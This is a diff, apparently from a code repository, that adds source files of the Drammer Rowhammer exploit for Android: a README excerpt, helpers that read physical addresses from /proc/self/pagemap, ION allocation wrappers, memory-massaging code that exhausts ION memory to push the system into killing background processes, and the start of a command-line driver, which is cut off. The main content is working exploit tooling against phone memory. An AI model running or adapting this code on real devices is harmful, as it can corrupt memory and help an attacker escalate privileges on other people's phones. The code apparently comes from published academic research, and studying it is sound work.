  137 +- *Makefile*
  138 + Build system.
  139 +
  140 +- *helper.h*
  141 + Inline helper functions defined in a header file.
  142 +
  143 +- *ion.cc* and *ion.h*
  144 + Implements all ION related functionality: allocate, share, and free. By using
  145 + a custom *ION data* data structure defined in ion.h, we also provide some
  146 + functions on top of these core ION ionctls: bulk (bulk allocations), mmap,
  147 + clean, and clean_all. It is required to call ION_init() before performing any
  148 + ION related operations, as this function takes care of opening the /dev/ion
  149 + file and reads /proc/cpuinfo to determine which ION heap to use. Note that
  150 + the latter functionality is likely incomplete.
  151 +
  152 +- *massage.cc* and *massage.h*
  153 + Implements exhaust (used for exhausting ION chunks: allocate until nothing is
  154 + left) and defrag functions.
  155 +
  156 +- *rh-test.cc*
  157 + Implements main() and is in charge of parsing the command line options and
  158 + starting a template session.
  159 +
  160 +- *rowsize.cc* and *rowsize.h*
  161 + Implements the auto detect function for finding the rowsize (described in more
  162 + detail in the paper, Sections 5.1 and 8.1, and Figure 3)
  163 +
  164 +- *templating.cc* and *templating.h*
  165 + Implements the actual Rowhammer test and builds template_t data structures
  166 + (defined in templating.h, which might include some redundant fields). The
  167 + is_exploitable() function checks whether a given template is in fact
  168 + exploitable with Drammer. The main function is TMPL_run which loops over all
  169 + hammerable ION chunks.
... ...
exploits/drammer/helper.h 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/helper.h
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +#ifndef __HELPER_H__
  18 +#define __HELPER_H__
  19 +
  20 +#include <assert.h>
  21 +#include <fcntl.h>
  22 +#include <stdlib.h>
  23 +#include <sys/stat.h>
  24 +#include <sys/types.h>
  25 +
  26 +#include <algorithm>
  27 +#include <cmath>
  28 +#include <numeric>
  29 +
  30 +#define G(x) (x << 30)
  31 +#define M(x) (x << 20)
  32 +#define K(x) (x << 10)
  33 +
  34 +#define B_TO_ORDER(x) (ffs(x / 4096)-1)
  35 +#define KB_TO_ORDER(x) (ffs(x / 4)-1)
  36 +#define MB_TO_ORDER(x) (ffs(x * 256)-1)
  37 +
  38 +#define ORDER_TO_B(x) ((1 << x) * 4096)
  39 +#define ORDER_TO_KB(x) ((1 << x) * 4)
  40 +#define ORDER_TO_MB(x) ((1 << x) / 256)
  41 +
  42 +#define MAX_ORDER 10
  43 +
  44 +#define BILLION 1000000000L
  45 +#define MILLION 1000000L
  46 +
  47 +extern FILE *global_of;
  48 +
  49 +static inline uint64_t get_ns(void) {
  50 + struct timespec t;
  51 + clock_gettime(CLOCK_MONOTONIC, &t);
  52 + return BILLION * (uint64_t) t.tv_sec + (uint64_t) t.tv_nsec;
  53 +}
  54 +
  55 +static inline uint64_t get_ms(void) {
  56 + struct timeval tv;
  57 + gettimeofday(&tv, NULL);
  58 + return MILLION * (uint64_t) tv.tv_sec + tv.tv_usec;
  59 +}
  60 +
  61 +static int pagemap_fd = 0;
  62 +static bool got_pagemap = true;
  63 +
  64 +static inline uintptr_t get_phys_addr(uintptr_t virtual_addr) {
  65 + if (!got_pagemap) return 0;
  66 + if (pagemap_fd == 0) {
  67 + pagemap_fd = open("/proc/self/pagemap", O_RDONLY);
  68 + if (pagemap_fd < 0) {
  69 + got_pagemap = false;
  70 + return 0;
  71 + }
  72 + }
  73 + uint64_t value;
  74 + off_t offset = (virtual_addr / PAGESIZE) * sizeof(value);
  75 + int got = pread(pagemap_fd, &value, sizeof(value), offset);
  76 + assert(got == 8);
  77 +
  78 + // Check the "page present" flag.
  79 + if ((value & (1ULL << 63)) == 0) {
  80 + printf("page not present? virtual address: %p | value: %p\n", virtual_addr, value);
  81 + return 0;
  82 + }
  83 +
  84 + uint64_t frame_num = (value & ((1ULL << 54) - 1));
  85 + return (frame_num * PAGESIZE) | (virtual_addr & (PAGESIZE-1));
  86 +}
  87 +
  88 +static inline uint64_t compute_median(std::vector<uint64_t> &v) {
  89 + if (v.size() == 0) return 0;
  90 + std::vector<uint64_t> tmp = v;
  91 + size_t n = tmp.size() / 2;
  92 + std::nth_element(tmp.begin(), tmp.begin()+n, tmp.end());
  93 + return tmp[n];
  94 +}
  95 +
  96 +static inline void print(const char *format, ...) {
  97 + va_list args;
  98 + va_start(args, format);
  99 + vfprintf(stdout, format, args);
  100 + if (global_of != NULL) vfprintf(global_of, format, args);
  101 + va_end(args);
  102 +}
  103 +
  104 +#endif // __HELPER_H__
... ...
exploits/drammer/ion.cc 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/ion.cc
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +#include <assert.h>
  18 +#include <fcntl.h>
  19 +#include <stdint.h>
  20 +#include <stdlib.h>
  21 +#include <stdlib.h>
  22 +#include <sys/ioctl.h>
  23 +#include <sys/mman.h>
  24 +#include <sys/stat.h>
  25 +#include <sys/types.h>
  26 +#include <unistd.h>
  27 +
  28 +#include <fstream>
  29 +#include <iostream>
  30 +#include <map>
  31 +#include <numeric>
  32 +#include <sstream>
  33 +#include <vector>
  34 +
  35 +#include <linux/ion.h>
  36 +
  37 +#include "helper.h"
  38 +#include "ion.h"
  39 +
  40 +int chipset;
  41 +#define CHIPSET_MSM 21
  42 +#define CHIPSET_MEDIATEK 1
  43 +#define CHIPSET_EXYNOS 4
  44 +#define CHIPSET_MAKO 25
  45 +#define CHIPSET_TEGRA 2
  46 +#define CHIPSET_UNIVERSAL 1
  47 +#define CHIPSET_KIRIN 1
  48 +#define CHIPSET_SPREADTRUM 2
  49 +#define CHIPSET_QCT 22
  50 +
  51 +int ion_fd;
  52 +extern int rowsize;
  53 +
  54 +/**********************************************
  55 + * Core ION wrappers
  56 + **********************************************/
  57 +ion_user_handle_t ION_alloc(int len, int heap_id) {
  58 + if (heap_id == -1 && len > M(4)) return 0;
  59 + struct ion_allocation_data allocation_data;
  60 +
  61 + if (heap_id == -1) {
  62 + allocation_data.heap_id_mask = (0x1 << chipset);
  63 + } else {
  64 + allocation_data.heap_id_mask = (0x1 << heap_id);
  65 + }
  66 + allocation_data.flags = 0;
  67 + allocation_data.align = 0;
  68 + allocation_data.len = len;
  69 + int err = ioctl(ion_fd, ION_IOC_ALLOC, &allocation_data);
  70 + if (err) return 0;
  71 + return allocation_data.handle;
  72 +}
  73 +int ION_share(ion_user_handle_t handle) {
  74 + struct ion_fd_data fd_data;
  75 + fd_data.handle = handle;
  76 + int err = ioctl(ion_fd, ION_IOC_SHARE, &fd_data);
  77 + if (err) return -1;
  78 + return fd_data.fd;
  79 +}
  80 +int ION_free(ion_user_handle_t handle) {
  81 + struct ion_handle_data handle_data;
  82 + handle_data.handle = handle;
  83 + int err = ioctl(ion_fd, ION_IOC_FREE, &handle_data);
  84 + if (err) return -1;
  85 + return 0;
  86 +}
  87 +
  88 +/**********************************************
  89 + * Mmap a struct ion_data
  90 + **********************************************/
  91 +int ION_mmap(struct ion_data *data, int prot, int flags, void *addr) {
  92 + data->fd = ION_share(data->handle);
  93 + if (data->fd < 0) {
  94 + perror("Could not share");
  95 + return -1;
  96 + //exit(EXIT_FAILURE);
  97 + }
  98 +
  99 + if ( prot == -1) prot = PROT_READ | PROT_WRITE;
  100 + if (flags == -1) flags = MAP_SHARED | MAP_POPULATE;
  101 +
  102 + data->mapping = mmap(addr, data->len, prot, flags, data->fd, 0);
  103 + if (data->mapping == MAP_FAILED) {
  104 + perror("Could not mmap");
  105 + exit(EXIT_FAILURE);
  106 + }
  107 +
  108 + return 0;
  109 +}
  110 +
  111 +/**********************************************
  112 + * Free a struct ion_data
  113 + **********************************************/
  114 +void ION_clean(struct ion_data *data) {
  115 + if (data->mapping) {
  116 + if (munmap(data->mapping, data->len)) {
  117 + perror("Could not munmap");
  118 + exit(EXIT_FAILURE);
  119 + }
  120 + data->mapping = NULL;
  121 +
  122 + if (close(data->fd)) {
  123 + perror("Could not close");
  124 + exit(EXIT_FAILURE);
  125 + }
  126 + }
  127 +
  128 + if (data->handle) {
  129 + if (ION_free(data->handle)) {
  130 + perror("Could not free");
  131 + exit(EXIT_FAILURE);
  132 + }
  133 + data->handle = 0;
  134 + }
  135 +}
  136 +
  137 +/**********************************************
  138 + * Allocate ION chunks in bulk
  139 + **********************************************/
  140 +
  141 +/* Our java app will send a SIGUSR1 signal if the system is low on memory. This
  142 + * probably requires a bit more debugging... */
  143 +
  144 +bool lowmem;
  145 +void lowmem_handler(int signal) {
  146 + print("LOW MEMORY!\n");
  147 + lowmem = true;
  148 +}
  149 +
  150 +int ION_bulk(int len, std::vector<struct ion_data *> &chunks, int max, bool mmap) {
  151 + lowmem = false;
  152 + signal(SIGUSR1, lowmem_handler);
  153 +
  154 + int count = 0;
  155 + while (true) {
  156 + struct ion_data *data = new ion_data;
  157 + if (data == NULL) {
  158 + perror("Could not malloc");
  159 + exit(EXIT_FAILURE);
  160 + }
  161 +
  162 + data->handle = ION_alloc(len);
  163 + if (data->handle == 0) {
  164 + /* Could not allocate, probably exhausted the ion chunks */
  165 + free(data);
  166 + break;
  167 + }
  168 + data->len = len;
  169 +
  170 + if (mmap) {
  171 + int ret = ION_mmap(data);
  172 + if (ret < 0) {
  173 + break;
  174 + }
  175 + } else {
  176 + data->mapping = NULL;
  177 + }
  178 +
  179 + data->hammerable_rows.clear();
  180 +
  181 + chunks.push_back(data);
  182 + count++;
  183 + if (max > 0 && count >= max) break;
  184 +
  185 + if (lowmem) break;
  186 + }
  187 + return count;
  188 +}
  189 +
  190 +/**********************************************
  191 + * Clean a vector of struct ion_data
  192 + **********************************************/
  193 +void ION_clean_all(std::vector<struct ion_data *> &chunks, int max) {
  194 + if (!max) max = chunks.size();
  195 + for (int i = 0; i < max; i++) {
  196 + ION_clean(chunks[i]);
  197 + delete(chunks[i]);
  198 + }
  199 + chunks.erase(chunks.begin(), chunks.begin() + max); // remove first <max> elements
  200 +}
  201 +
  202 +/**********************************************
  203 + * Populate a vector of virtual address that we can hammer
  204 + **********************************************/
  205 +void ION_get_hammerable_rows(struct ion_data * chunk) {
  206 + if (chunk->len < (3*rowsize)) return;
  207 + if (chunk->mapping == NULL) return;
  208 + for (int offset = rowsize;
  209 + offset < chunk->len - rowsize;
  210 + offset += rowsize) {
  211 + uintptr_t virt_row = (uintptr_t) chunk->mapping + offset;
  212 + chunk->hammerable_rows.push_back(virt_row);
  213 + }
  214 +}
  215 +
  216 +
  217 +/**********************************************
  218 + * Initialize and finalize /dev/ion
  219 + **********************************************/
  220 +void ION_init(void) {
  221 + // get chipset
  222 + chipset = CHIPSET_MSM;
  223 + std::ifstream cpuinfo("/proc/cpuinfo");
  224 + for (std::string line; getline(cpuinfo, line); ) {
  225 + if (line.find("Qualcomm") != std::string::npos) {
  226 + print("Detected chipset: Qualcomm\n");
  227 + chipset = CHIPSET_MSM;
  228 + break;
  229 + }
  230 + if (line.find("Exynos") != std::string::npos) {
  231 + print("Detected chipset: Exynos\n");
  232 + chipset = CHIPSET_EXYNOS;
  233 + break;
  234 + }
  235 + if (line.find(": 0x53") != std::string::npos) {
  236 + print("Detected chipset: Exynos\n"); // S7, S7 Edge, but probably more :(
  237 + chipset = CHIPSET_EXYNOS;
  238 + break;
  239 + }
  240 + if (line.find(": sc") != std::string::npos) {
  241 + // Hardware : sc8830
  242 + print("Detected chipset: Spreadtrum\n");
  243 + chipset = CHIPSET_SPREADTRUM;
  244 + break;
  245 + }
  246 + if (line.find("EXYNOS") != std::string::npos) {
  247 + // Samsung EXYNOS5433
  248 + print("Detected chipset: Exynos\n");
  249 + chipset = CHIPSET_EXYNOS;
  250 + break;
  251 + }
  252 + if (line.find("UNIVERSAL") != std::string::npos) {
  253 + print("Detected chipset: UNIVERSAL\n");
  254 + chipset = CHIPSET_UNIVERSAL;
  255 + break;
  256 + }
  257 + if (line.find("MAKO") != std::string::npos) {
  258 + print("Detected chipset: Mako\n");
  259 + chipset = CHIPSET_MAKO;
  260 + break;
  261 + }
  262 + if (line.find("Flounder") != std::string::npos) {
  263 + print("Detected chipset: Tegra\n");
  264 + chipset = CHIPSET_TEGRA;
  265 + break;
  266 + }
  267 + if (line.find(": MT") != std::string::npos) {
  268 + print("Detected chipset: Mediatek\n");
  269 + chipset = CHIPSET_MEDIATEK;
  270 + break;
  271 + }
  272 + if (line.find(": hi") != std::string::npos) {
  273 + print("Detected chipset Kirin\n");
  274 + chipset = CHIPSET_KIRIN;
  275 + break;
  276 + }
  277 + if (line.find("Kirin") != std::string::npos) {
  278 + print("Detected chipset Kirin\n");
  279 + chipset = CHIPSET_KIRIN;
  280 + break;
  281 + }
  282 + if (line.find("MSM8627") != std::string::npos) {
  283 + print("Detected cihpset MSM8627\n");
  284 + chipset = CHIPSET_QCT;
  285 + }
  286 + }
  287 +
  288 + ion_fd = open("/dev/ion", O_RDONLY);
  289 + if (!ion_fd) {
  290 + perror("Could not open ion");
  291 + exit(EXIT_FAILURE);
  292 + }
  293 +
  294 + int err;
  295 + sigset_t sigset;
  296 +
  297 + err = sigfillset(&sigset);
  298 + if (err != 0) perror("sigfillset");
  299 +
  300 + err = sigprocmask(SIG_UNBLOCK, &sigset, NULL);
  301 + if (err != 0) perror("sigprocmask");
  302 +
  303 + setvbuf(stdout, NULL, _IONBF, 0);
  304 +}
  305 +void ION_fini(void) {
  306 + close(ion_fd);
  307 +}
  308 +
  309 +
  310 +
  311 +
  312 +void ION_detector(void) {
  313 + for (int i = 0; i < 32; i++) {
  314 + uint32_t mask = 0x1 << i;
  315 + printf("Trying to allocate 4KB with heap id: %2d | mask: %8x ", i, mask);
  316 +
  317 + struct ion_handle_data handle_data;
  318 + struct ion_allocation_data allocation_data;
  319 + allocation_data.flags = 0;
  320 + allocation_data.align = 0;
  321 + allocation_data.len = K(4);
  322 + allocation_data.heap_id_mask = mask;
  323 + int err = ioctl(ion_fd, ION_IOC_ALLOC, &allocation_data);
  324 + if (err) {
  325 + printf(" -> nope (%s)\n", strerror(errno));
  326 + continue;
  327 + }
  328 + printf(" -> ok!\n");
  329 + handle_data.handle = allocation_data.handle;
  330 + err = ioctl(ion_fd, ION_IOC_FREE, &handle_data);
  331 + if (err) {
  332 + printf(" -> could not free (%s)\n", strerror(errno));
  333 + continue;
  334 + }
  335 +
  336 + printf("...... to allocate 4MB with heap id: %2d | mask: %8x ", i, mask);
  337 + allocation_data.len = M(4);
  338 + err = ioctl(ion_fd, ION_IOC_ALLOC, &allocation_data);
  339 + if (err) {
  340 + printf(" -> nope (%s)\n", strerror(errno));
  341 + continue;
  342 + }
  343 + printf(" -> ok!\n");
  344 + handle_data.handle = allocation_data.handle;
  345 + err = ioctl(ion_fd, ION_IOC_FREE, &handle_data);
  346 + if (err) {
  347 + printf(" -> could not free (%s)\n", strerror(errno));
  348 + continue;
  349 + }
  350 +
  351 + printf("...... to allocate 16MB with heap id: %2d | mask: %8x ", i, mask);
  352 + allocation_data.len = M(16);
  353 + err = ioctl(ion_fd, ION_IOC_ALLOC, &allocation_data);
  354 + if (err) {
  355 + printf(" -> nope (%s)\n", strerror(errno));
  356 + continue;
  357 + }
  358 + printf(" -> ok!\n");
  359 + handle_data.handle = allocation_data.handle;
  360 + err = ioctl(ion_fd, ION_IOC_FREE, &handle_data);
  361 + if (err) {
  362 + printf(" -> could not free (%s)\n", strerror(errno));
  363 + continue;
  364 + }
  365 + }
  366 +}
... ...
exploits/drammer/ion.h 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/ion.h
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +
  18 +#ifndef __ION_H__
  19 +#define __ION_H__
  20 +
  21 +#include <map>
  22 +#include <numeric>
  23 +#include <set>
  24 +#include <vector>
  25 +
  26 +#include <linux/ion.h>
  27 +#include <strings.h>
  28 +
  29 +
  30 +struct ion_data {
  31 + ion_user_handle_t handle;
  32 + int fd, len;
  33 + void *mapping = NULL;
  34 +
  35 + std::vector<uintptr_t> hammerable_rows;
  36 +};
  37 +
  38 +
  39 +
  40 +ion_user_handle_t ION_alloc(int len, int heap_id = -1);
  41 +int ION_share(ion_user_handle_t handle);
  42 +int ION_free (ion_user_handle_t handle);
  43 +
  44 +int ION_mmap (struct ion_data *data, int prot = -1, int flags = -1, void *addr = NULL);
  45 +void ION_clean(struct ion_data *data);
  46 +int ION_bulk(int len, std::vector<struct ion_data *> &chunks, int max = 0, bool mmap = true);
  47 +void ION_clean_all( std::vector<struct ion_data *> &chunks, int max = 0);
  48 +void ION_get_hammerable_rows(struct ion_data *chunk);
  49 +
  50 +void ION_detector(void);
  51 +void ION_init(void);
  52 +void ION_fini(void);
  53 +
  54 +#endif
... ...
exploits/drammer/massage.cc 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/massage.cc
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +#include <algorithm>
  18 +#include <fstream>
  19 +#include <iostream>
  20 +#include <set>
  21 +
  22 +#include <assert.h>
  23 +#include <fcntl.h>
  24 +#include <stdint.h>
  25 +#include <stdio.h>
  26 +#include <stdlib.h>
  27 +#include <string>
  28 +#include <sys/ioctl.h>
  29 +#include <sys/mman.h>
  30 +#include <sys/stat.h>
  31 +#include <sys/types.h>
  32 +#include <unistd.h>
  33 +
  34 +#include "helper.h"
  35 +#include "ion.h"
  36 +#include "massage.h"
  37 +#include "rowsize.h"
  38 +#include "templating.h"
  39 +
  40 +extern bool lowmem;
  41 +
  42 +bool alloc_timeout;
  43 +void alloc_alarm(int signal) {
  44 + printf("Allocation timeout\n");
  45 + alloc_timeout = true;
  46 +}
  47 +
  48 +std::ifstream meminfo("/proc/meminfo");
  49 +size_t read_meminfo(std::string type) {
  50 + meminfo.clear();
  51 + meminfo.seekg(0, std::ios::beg);
  52 + for (std::string line; getline(meminfo, line); ) {
  53 + if (line.find(type) != std::string::npos) {
  54 + std::string kb = line.substr( line.find(':') + 1, line.length() - type.length() - 3 );
  55 + return std::atoi(kb.c_str());
  56 + }
  57 + }
  58 + return 0;
  59 +}
  60 +size_t get_LowFree(void) { return read_meminfo("LowFree"); }
  61 +
  62 +int exhaust(std::vector<struct ion_data *> &chunks, int min_bytes, bool mmap) {
  63 + int total_kb;
  64 +
  65 + total_kb = 0;
  66 + for (int order = MAX_ORDER; order >= B_TO_ORDER(min_bytes); order--) {
  67 + int count = ION_bulk(ORDER_TO_B(order), chunks, 0, mmap);
  68 + print("[EXHAUST] - order %2d (%4d KB) - got %3d chunks\n",
  69 + order, ORDER_TO_KB(order), count);
  70 + total_kb += ORDER_TO_KB(order) * count;
  71 +
  72 + if (lowmem) break;
  73 + }
  74 + print("[EXHAUST] allocated %d KB (%d MB)\n", total_kb, total_kb / 1024);
  75 +
  76 + return total_kb;
  77 +}
  78 +
  79 +
  80 +
  81 +
  82 +/* stop defrag when it has been working for more than ALLOC_TIMEOUT seconds */
  83 +#define ALLOC_TIMEOUT 10
  84 +
  85 +/* stop defrag when the system has less than MIN_LOWFREE KB low memory left */
  86 +#define MIN_LOWFREE 4 * 1024
  87 +
  88 +/* stop defrag when none of the last <INTERVAL> allocations yield more than MIN_COUNT blocks */
  89 +#define INTERVAL 10
  90 +#define MIN_COUNT 10
  91 +
  92 +/* The goal of defrag() is to trick the system into reserving more 'ION memory'
  93 + * that we can allocate when we start templating. We do this by exhausting all
  94 + * 4K ION chunks, resulting in the low memory killer killing background
  95 + * processes and moving cached memory into a pool that can be used for ION
  96 + * allocations.
  97 + *
  98 + * We first exhaust all contiguous chunks of size 64KB and up, to ensure that
  99 + * background processes are already forced to use smaller contiguous memory
  100 + * chunks (up to 32KB). Since we cannot simply exhaust *all* 4KB chunks (we
  101 + * would go completely out of memory), we then allocate chunks until:
  102 + * - a timeout occurs (after ALLOC_TIMEOUT seconds); or
  103 + * - the system has little free low memory left (MIN_LOWFREE KB); or
  104 + * - we did not get many new blocks during the last x seconds (INTERAL /
  105 + * MINCOUNT)
  106 + */
  107 +void defrag(int alloc_timer) {
  108 + std::vector<struct ion_data *> defrag_chunks;
  109 +
  110 + time_t start_time = 0;
  111 + time_t prev_time = 0;
  112 + int count = 0;
  113 + int prev_count = 0;
  114 + int alloc_count[INTERVAL];
  115 + for (int i = 0; i < INTERVAL; i++) alloc_count[i] = MIN_COUNT + 1;
  116 + int alloc_count_index = 0;
  117 + int len = K(4);
  118 +
  119 + exhaust(defrag_chunks, K(64), false);
  120 +
  121 + if (lowmem) goto bail;
  122 +
  123 + alloc_timeout = false;
  124 + signal(SIGALRM, alloc_alarm);
  125 + alarm(alloc_timer);
  126 +
  127 + start_time = time(NULL);
  128 +
  129 + while (true) {
  130 + struct ion_data *data = new ion_data;
  131 + if (data == NULL) {
  132 + perror("Could not allocate memory");
  133 + exit(EXIT_FAILURE);
  134 + }
  135 + data->handle = ION_alloc(len);
  136 + if (data->handle == 0) {
  137 + printf("Exhausted *all* memory?\n");
  138 + break;
  139 +// exit(EXIT_FAILURE);
  140 + }
  141 + data->len = len;
  142 + data->mapping = NULL;
  143 + count++;
  144 +
  145 + time_t curr_time = time(NULL);
  146 + if (curr_time != prev_time) {
  147 + int lowfree = get_LowFree();
  148 + int timerunning = (curr_time - start_time);
  149 + int timeleft = alloc_timer - timerunning;
  150 +
  151 + alloc_count[alloc_count_index] = (count - prev_count);
  152 + alloc_count_index = (alloc_count_index + 1) % 10;
  153 + bool progress = false;
  154 + print("[DEFRAG] Blocks allocated last %d intervals: ", 10);
  155 + for (int i = 9; i >= 0; i--) {
  156 + printf("%5d ", alloc_count[(alloc_count_index + i) % 10]);
  157 + if (alloc_count[i] > MIN_COUNT)
  158 + progress = true;
  159 + }
  160 + print(" | time left: %3d | low free: %8d KB | blocks: %8d\n",
  161 + timeleft, lowfree, count);
  162 +
  163 + if (!progress) {
  164 + print("[DEFRAG] Not enough progress\n");
  165 + break;
  166 + }
  167 +
  168 + // some devices do not report LowFree in /proc/meminfo
  169 + if (lowfree > 0 && lowfree < MIN_LOWFREE) {
  170 + print("[DEFRAG] Not enough low memory\n");
  171 + break;
  172 + }
  173 +
  174 + if (alloc_timeout) {
  175 + print("[DEFRAG] Timeout\n");
  176 + break;
  177 + }
  178 +
  179 + prev_count = count;
  180 + prev_time = curr_time;
  181 + }
  182 + defrag_chunks.push_back(data);
  183 + }
  184 +
  185 + print("[DEFRAG] Additionally got %d chunks of size %d KB (%d bytes in total = %d MB)\n",
  186 + count, len, count * len, count * len / 1024 / 1024);
  187 +
  188 +bail:
  189 + ION_clean_all(defrag_chunks);
  190 +
  191 + printf("[DEFRAG] Dumping /proc/pagetypeinfo\n");
  192 + std::ifstream pagetypeinfo("/proc/pagetypeinfo");
  193 + pagetypeinfo.clear();
  194 + pagetypeinfo.seekg(0, std::ios::beg);
  195 + for (std::string line; getline(pagetypeinfo, line); ) {
  196 + if (!line.empty()) print("%s\n", line.c_str());
  197 + }
  198 +}
... ...
exploits/drammer/massage.h 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/massage.h
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +
  18 +#ifndef __MASSAGE_H__
  19 +#define __MASSAGE_H__
  20 +
  21 +void defrag(int alloc_timer);
  22 +int exhaust(std::vector<struct ion_data *> &chunks, int min_bytes, bool mmap = true);
  23 +
  24 +#endif
... ...
exploits/drammer/rh-test.cc 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/rh-test.cc
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +#include <algorithm>
  18 +#include <fstream>
  19 +#include <iostream>
  20 +#include <set>
  21 +#include <string>
  22 +
  23 +#include <assert.h>
  24 +#include <fcntl.h>
  25 +#include <stdint.h>
  26 +#include <stdio.h>
  27 +#include <stdlib.h>
  28 +#include <sys/ioctl.h>
  29 +#include <sys/mman.h>
  30 +#include <sys/stat.h>
  31 +#include <sys/types.h>
  32 +#include <unistd.h>
  33 +
  34 +#include "helper.h"
  35 +#include "ion.h"
  36 +#include "massage.h"
  37 +#include "rowsize.h"
  38 +#include "templating.h"
  39 +
  40 +#define HAMMER_READCOUNT 1000000
  41 +
  42 +FILE *global_of = NULL;
  43 +
  44 +extern int rowsize;
  45 +
  46 +
  47 +
  48 +void usage(char *main_program) {
  49 + fprintf(stderr,"Usage: %s [-a] [-c count] [-d seconds] [-f file] [-h] [-i] [-q cpu] [-r rowsize] [-t timer]\n", main_program);
  50 + fprintf(stderr," -a : Run all pattern combinations\n");
  51 + fprintf(stderr," -c count : Number of memory accesses per hammer round (default is %d)\n",HAMMER_READCOUNT);
  52 + fprintf(stderr," -d seconds: Number of seconds to run defrag (default is disabled)\n");
  53 + fprintf(stderr," -f file : Write output to this file\n");
  54 + fprintf(stderr," -h : This help\n");
  55 + fprintf(stderr," -i : Run ion heap type detector\n");
  56 + fprintf(stderr," -q cpu : Pin to this CPU\n");
  57 + fprintf(stderr," -r rowsize: Rowsize of DRAM module in B (autodetect if not specified)\n");
  58 + fprintf(stderr," -s : Hammer more conservative (currently set to hammering every 64 bytes)\n");
  59 + fprintf(stderr," -t timer : Number of seconds to hammer (default is to hammer everything)\n");
  60 +}
  61 +
  62 +void resetter(uint8_t *pattern) {
  63 + for (int i = 0; i < MAX_ROWSIZE; i++) {
  64 + pattern[i] = rand() % 255;
  65 + }
  66 +}
  67 +
  68 +
  69 +int main(int argc, char *argv[]) {
  70 + printf("______ ______ _______ _______ _______ _______ ______ \n");
  71 + printf("| \\ |_____/ |_____| | | | | | | |______ |_____/ \n");
  72 + printf("|_____/ | \\_ | | | | | | | | |______ | \\_\n");
  73 + printf("\n");
  74 +
  75 + int c;
  76 + int timer = 0;
  77 + int alloc_timer = 0;
  78 + char *outputfile = NULL;
  79 + int hammer_readcount = HAMMER_READCOUNT;
  80 + bool heap_type_detector = false;
  81 + bool do_conservative = false;
  82 + bool all_patterns = false;
  83 + int cpu_pinning = -1;
  84 + opterr = 0;
  85 + while ((c = getopt(argc, argv, "sac:d:f:hiq:r:t:")) != -1) {
  86 + switch (c) {
  87 + case 'a':
  88 + all_patterns = true;
  89 + break;
  90 + case 'c':
  91 + hammer_readcount = strtol(optarg, NULL, 10);
  92 + break;
  93 + case 'd':
  94 + alloc_timer = strtol(optarg, NULL, 10);
  95 + break;
  96 + case 'f':
  97 + outputfile = optarg;
  98 + break;
  99 + case 'h':
  100 + usage(argv[0]);
  101 + return 0;
  102 + case 'i':
  103 + heap_type_detector = true;
  104 + break;
  105 + case 'q':
  106 + cpu_pinning = strtol(optarg, NULL, 10);
  107 + break;
  108 + case 'r':
  109 + rowsize = strtol(optarg, NULL, 10);
  110 + break;
  111 + case 's':
  112 + do_conservative = true;
  113 + break;
  114 + case 't':
  115 + timer = strtol(optarg, NULL, 10);
  116 + break;
  117 + case '?':
